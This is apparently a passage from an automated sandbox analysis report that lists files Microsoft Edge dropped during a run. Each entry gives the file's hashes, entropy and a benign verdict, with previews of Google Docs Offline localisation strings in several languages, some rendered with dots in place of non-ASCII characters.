                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
